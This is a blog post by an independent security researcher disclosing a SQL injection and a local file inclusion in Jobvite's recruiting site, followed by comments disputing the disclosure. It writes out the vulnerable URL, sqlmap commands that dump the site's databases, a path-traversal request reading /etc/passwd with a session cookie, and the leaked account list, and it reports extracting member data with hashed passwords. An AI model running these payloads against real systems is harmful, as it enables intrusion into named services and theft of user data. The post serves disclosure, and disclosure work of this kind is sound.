Hello i'm Mohamed M.Fouad an Independent Security Researcher from Egypt. I have been got acknowledgement from many of the Firms like as Microsoft,Oracle,Yahoo,eBay,Sony,AT&T,Huawui,DropCam, Bitcasa, Get Pocket, Splitwise and so many...
Hello Guys!
Today I will show you how I found a Boolean SQLi and LFI vulnerabilities in Jobvite. First, let me tell you about Jobvite. Jobvite is a Social recruiting and applicant tracking created for companies with the highest expectations of candidate quality and recruiting technology. I Reported these critical security vulnerabilities 3 Months ago but they didn't fix anything yet so i decided to write about this great finding and it was one of the best security vulnerabilities i have ever discovered.
Story:
While Investigating about vulnerabilities in Odesk (Freelancer Jobs famous website) i found an iframe loaded from (Jobvite) and it was so interesting for me so i switched my pen test to jobvite website and after a lot of hard work hours investigating i found Boolean SQLi in "cat" parameter in the below URL so as everyone know about boolean SQLi this kind of sql injection asks the database true or false questions and determines the answer based on the applications response so after i tried a lot of these tricks i found that "cat" parameter is vulnerable this makes exploiting the SQL Injection vulnerability more difficult, but not impossible. so i opened sqlmap and executed the below command i already got the databases available on "Jobvite" website so i tried to get the information schema of the database and i succeeded with the second command below then i tried to get tables columns and data
Vulnerable URL :
http://recruiting.jobvite.com/customers/?cat=-1 OR 17-7=10
Payload Commands :
Command 1 : sqlmap.py -u http://recruiting.jobvite.com/customers/?cat=-1 --dbs
Command 2 : sqlmap.py -u http://recruiting.jobvite.com/customers/?cat=-1 -D <database_name> --tables
Command 3 : sqlmap.py -u http://recruiting.jobvite.com/customers/?cat=-1 -T <table_name> --columns
Command 4: sqlmap.py -u http://recruiting.jobvite.com/customers/?cat=-1 -T <table_name> --dump
Jobvite Databases :
available databases [3]:
[*] information_schema
[*] recruiting
[*] test
So After i got all jobvite databases i started to load tables and all data then extracted it to excel files and it was a sensitive information about member and their created profiles , logins with hashed passwords , salts , email , etc....
So after this great finding i decided to never stop looking for more critical vulnerabilities at jobvite after another hard work of hours i found LFI vulnerability allowed me to view all their LINUX USER ACCOUNTS EXISTS
Vulnerable URL :
| http://recruiting.jobvite.com/ |
Request :
GET /themes/jobvite/js/proxy.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Cache-Control: no-cache
Referer: http://recruiting.jobvite.com/company/blog/
User-Agent: Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0;)
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
Accept-Language: en-us,en;q=0.5
Host: recruiting.jobvite.com
Cookie: PHPSESSID=jptdpcj7hv67q2cvsh7gq0r8e5; AWSELB=F70F99F314754553144E10626D06E4B925C9BA361D8989148366459359D4C53E10A6006CB0477B40A9FD3FFFD8451EF600469DF4E4E57E1F8ECC5962D1C364EE83A01FC361
Accept-Encoding: gzip, deflate
Response:
HTTP/1.1 200 OK
Connection: Keep-Alive
Date: Tue, 01 Apr 2014 17:29:24 GMT
Server: Apache/2.2.15 (Red Hat)
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Content-Encoding:
Content-Length: 725
Content-Type: application/xml
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
qpidd:x:498:499:Owner of Qpidd Daemons:/var/lib/qpidd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
oprofile:x:16:16:Special user account to be used by OProfile:/home/oprofile:/sbin/nologin
bacula:x:133:133:Bacula Backup System:/var/spool/bacula:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
ken:x:501:500::/home/ken:/bin/bash
margaret:x:502:500::/home/margaret:/bin/bash
patrick:x:503:500::/home/patrick:/bin/bash
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
varun:x:504:504:Varun Aggarwal:/home/varun:/bin/bash
I found another vulnerabilities here but SQLi and LFI was the best :D so i reported to jobvite about these critical security vulnerabilities and after couple of days a a guy called "Mahesh Thimmaiah" Application security consultant of jobvite replied me with the below :
Heres the video demonstration URL :
Hope you find it interesting and HAVE FUN with POC Video :)
CAUTION
THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...
Regards,
Hello Mohamed,
ReplyDeleteYour report is incorrect.
Our application is completely secure. This vulnerability is on SilverStripe, our corporate content management system that hosts Jobvite marketing content. Our corporate site does not contain any application or customer data.
Jobvite application and customer data are completely secure.
Please remove this article at your earliest. Please let me know if you would like to discuss this further.
Sincerely,
-Adam Hyder
Hello Adam,
DeleteFirst thanks for your reply and kindly be informed that i'm ethical security researcher . when i found these critical vulnerabilities i contacted jobvite immediately and got a reply from "Mahesh" who responsible for jobvite security so i send him all the data he requested 4 months ago without response again!! so it's a jobvite problem not me and jobvite is responsible for their website even if this impact because another product jobvite already used. jobvite didn't take the responsibility about my report and it was critical and don't forget i reported this ethically and jobvite ignored me if you see here it's a clear SQLi and i got data whatever data is critical or not for you but for me it's a data from jobvite website. so if you want to talk about that contact me in my email "flash162011@gmail.com".
Regards,
@Mohamed
DeleteIts not a ethical hacker way to showcase the findings to public...
If jobvite team is not interested in your findings leave that, its their business and reputation.
@Adam
DeleteStill the vulnerability is there. Your whole db can be copied.. You should hire pro programmer for coding...
This comment has been removed by the author.
DeleteThis is entirely incorrect Adam.
ReplyDeleteSilverStripe by default (especially at the extremely outdated version you are using) ships as nothing more than a reasonably simple CMS built upon a framework which allows an author to create and edit relatively simple content pages consisting of HTML text and uploaded images.
SilverStripe can be used as far more than this as it has been built ground up on a framework as mentioned. This allows developers to easily and speedily build upon the CMS or develop their own system. This of course means though that standard practice should apply when dealing with security - input must be escaped before being utilised, and at least some basic pen-testing should take place.
In all cases one should try to work within their chosen framework, not AROUND it, as is painfully obvious by your having executable PHP within the themes directory (which is not normal at all). Of course SilverStripe can aid with escaping user data before it is passed through to the database layer, but it seems that even this is being ignored by your developers (as evident with the GET variables in the URL leading to injections).
In any case, it is most certainly your custom code built within (or in this case around) SilverStripe that is causing issue, and your statement here denying as such does not make it any less real - it simply amounts to poor PR & bullying tactics to make a problem go away (which it won't - only fixing it will do that). It is certainly unfair to blame another system (truth or not), as it it ultimately your company's choice and duty to evaluate it and ensure its secruity, along with the resulting product you construct from it.
SilverStripe is open source (BSD licence), and thus will also accept commits back upstream to patch any security issues found within it (or at least deal with them internally if notified as such) - although version 2.4 is fast coming up on end of life for even security patches now, it is that out of date. http://www.silverstripe.org/silverstripe-2-4-end-of-life-announcement/
Dear @Arun , i think it's not ethical from @Adam to disclose the technology he has used and throw it to another player, and about @Mohamed he is so ethical because he wants to protect people info so he gave JobVite too much time to fix the issue but you didn't do action as per the email mentioned in the blog, so if JobVite don't care about this critical vulnerability so who will care.Thanks again @Mohamed but kindly modify the blog to give a warning for the reader "this is for learning purpose and for Ethical use".
ReplyDelete@Pyro Thanks for you fair reply it's so logical and i respect that from you
Good Luck
WIBF